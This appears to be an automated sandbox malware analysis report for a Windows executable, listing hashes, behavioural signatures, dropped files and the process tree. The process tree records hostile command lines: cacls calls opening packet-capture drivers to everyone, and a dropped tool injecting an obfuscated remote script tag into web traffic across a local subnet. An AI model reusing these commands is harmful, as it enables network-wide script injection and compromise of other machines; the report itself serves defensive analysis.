Analysis

  • max time kernel
    93s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/10/2024, 04:32

General

  • Target

    04619db5b57ad16e50c042fe16e90987_JaffaCakes118.exe

  • Size

    176KB

  • MD5

    04619db5b57ad16e50c042fe16e90987

  • SHA1

    512e3461033c2f65d46d1967c44c4be3b5e90749

  • SHA256

    373623b19a0eb6f4a54003cec7c07ca3c79a763f748382f676c15ed69d6a322b

  • SHA512

    05b8c3229e2fdf7db0c3499f5ed298c0df69b45451d4f1730d055497d2a722c52a2829b432505ce0709fe39ff75aaf57629ff220d479a9de13d6d47884e6123b

  • SSDEEP

    3072:z0MJPlP21lO0P6brMPgOR26T89Ln22LKeQOineJ824INL9sfsNkyout7:z5Bc1z6MIOz899Binee2R9F/oS7

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04619db5b57ad16e50c042fe16e90987_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\04619db5b57ad16e50c042fe16e90987_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5008
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4916
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2460
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3120
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1972
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4016
    • C:\Windows\SysWOW64\360ucrp.exe
      -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://b%71h.K%77%69k.%54o/tj.js></script>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:5108
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 12.bat
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2788

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\12.bat

          Filesize

          2KB

          MD5

          bfdfcc046dc5fc3a3cd6b13cd16e9e31

          SHA1

          a1e46b354f890118b08e5d9fdcee630aed3d9cd1

          SHA256

          3aecd061955756c9fa60ac08a6f4760fdfc33f733ddac13a0767ef39eb7dfe86

          SHA512

          f2906d16c1f0aec3c45e6a9bb85102db341989829cdc2302757e26e003c9fb0baa6c1b4a18eb441348fdf981b11f1abc1de6963674f56fd0abe3c96f3e26dc63

        • C:\Windows\SysWOW64\360ucrp.exe

          Filesize

          8.0MB

          MD5

          e1735b7692449df0632c6d79f3a76454

          SHA1

          a2f1284638f1b748d12c6606de8e791c689a5b5d

          SHA256

          f41ab040f0ed9b178ec85a2781242a33405c0510dfd3e452200b6a5f5cceba9e

          SHA512

          abd7aaaab6ef07838a53a9f757771f3990445569629e9e149c96f1cde39bd1e6efcc91a428828e53b947dd09764a53a3bf376404e216a679e6995ec99e5e6f2b

        • C:\Windows\SysWOW64\WanPacket.dll

          Filesize

          66KB

          MD5

          fdd104a9fd3427a1df37041fa947a041

          SHA1

          cca1881a3c02033008f78cc39b712b637c7f3e13

          SHA256

          384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

          SHA512

          9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

        • C:\Windows\SysWOW64\packet.dll

          Filesize

          86KB

          MD5

          9062aeea8cbfc4f0780bbbefad7cebcb

          SHA1

          c4ad39ec51ad0e84fe58f62931d13cddfde3189e

          SHA256

          b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

          SHA512

          60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

        • C:\Windows\SysWOW64\wpcap.dll

          Filesize

          234KB

          MD5

          ce842d25e5b7e6ff21a86cad9195fbe8

          SHA1

          d762270be089a89266b012351b52c595e260b59b

          SHA256

          7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

          SHA512

          84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

        • memory/5008-0-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/5008-2-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/5108-11-0x0000000000400000-0x000000000040F000-memory.dmp

          Filesize

          60KB

        • memory/5108-18-0x0000000000550000-0x0000000000565000-memory.dmp

          Filesize

          84KB

        • memory/5108-22-0x0000000000440000-0x0000000000450000-memory.dmp

          Filesize

          64KB

        • memory/5108-23-0x0000000000400000-0x000000000040F000-memory.dmp

          Filesize

          60KB